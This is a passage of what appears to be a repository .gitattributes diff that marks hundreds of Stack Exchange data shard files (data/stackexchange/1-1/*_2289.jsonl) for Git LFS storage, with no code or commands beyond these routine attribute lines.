filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1308_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1309_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/130_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1310_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1311_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1312_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1313_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1314_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1315_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1316_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1317_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1318_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1319_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/131_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1320_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1321_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1322_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1323_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1324_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1325_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1326_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1327_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1328_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1329_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/132_2289.jsonl filter=lfs diff=lfs 
merge=lfs -text +data/stackexchange/1-1/1330_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1331_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1332_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1333_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1334_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1335_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1336_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1337_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1338_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1339_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/133_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1340_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1341_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1342_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1343_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1344_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1345_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1346_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1347_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1348_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1349_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/134_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1350_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1351_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1352_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1353_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1354_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1355_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1356_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1357_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1358_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1359_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/135_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1360_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1361_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1362_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1363_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1364_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1365_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1366_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1367_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1368_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1369_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/136_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1370_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1371_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1372_2289.jsonl 
filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1373_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1374_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1375_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1376_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1377_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1378_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1379_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/137_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1380_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1381_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1382_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1383_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1384_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1385_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1386_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1387_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1388_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1389_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/138_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1390_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1391_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1392_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1393_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1394_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1395_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1396_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1397_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1398_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1399_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/139_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/13_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1400_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1401_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1402_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1403_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1404_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1405_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1406_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1407_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1408_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1409_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/140_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1410_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1411_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1412_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1413_2289.jsonl filter=lfs diff=lfs merge=lfs -text 
+data/stackexchange/1-1/1414_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1415_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1416_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1417_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1418_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1419_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/141_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1420_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1421_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1422_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1423_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1424_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1425_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1426_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1427_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1428_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1429_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/142_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1430_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1431_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1432_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1433_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1434_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1435_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1436_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1437_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1438_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1439_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/143_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1440_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1441_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1442_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1443_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1444_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1445_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1446_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1447_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1448_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1449_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/144_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1450_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1451_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1452_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1453_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1454_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1455_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1456_2289.jsonl filter=lfs diff=lfs 
merge=lfs -text +data/stackexchange/1-1/1457_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1458_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1459_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/145_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1460_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1461_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1462_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1463_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1464_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1465_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1466_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1467_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1468_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1469_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/146_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1470_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1471_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1472_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1473_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1474_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1475_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1476_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1477_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1478_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1479_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/147_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1480_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1481_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1482_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1483_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1484_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1485_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1486_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1487_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1488_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1489_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/148_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1490_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1491_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1492_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1493_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1494_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1495_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1496_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1497_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1498_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1499_2289.jsonl 
filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/149_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/14_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1500_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1501_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1502_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1503_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1504_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1505_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1506_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1507_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1508_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1509_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/150_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1510_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1511_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1512_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1513_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1514_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1515_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1516_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1517_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1518_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1519_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/151_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1520_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1521_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1522_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1523_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1524_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1525_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1526_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1527_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1528_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1529_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/152_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1530_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1531_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1532_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1533_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1534_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1535_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1536_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1537_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1538_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1539_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/153_2289.jsonl filter=lfs diff=lfs merge=lfs -text 
+data/stackexchange/1-1/1540_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1541_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1542_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1543_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1544_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1545_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1546_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1547_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1548_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1549_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/154_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1550_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1551_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1552_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1553_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1554_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1555_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1556_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1557_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1558_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1559_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/155_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1560_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1561_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1562_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1563_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1564_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1565_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1566_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1567_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1568_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1569_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/156_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1570_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1571_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1572_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1573_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1574_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1575_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1576_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1577_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1578_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1579_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/157_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1580_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1581_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1582_2289.jsonl filter=lfs diff=lfs 
merge=lfs -text +data/stackexchange/1-1/1583_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1584_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1585_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1586_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1587_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1588_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1589_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/158_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1590_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1591_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1592_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1593_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1594_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1595_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1596_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1597_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1598_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1599_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/159_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/15_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1600_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1601_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1602_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1603_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1604_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1605_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1606_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1607_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1608_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1609_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/160_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1610_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1611_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1612_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1613_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1614_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1615_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1616_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1617_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1618_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1619_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/161_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1620_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1621_2289.jsonl filter=lfs diff=lfs 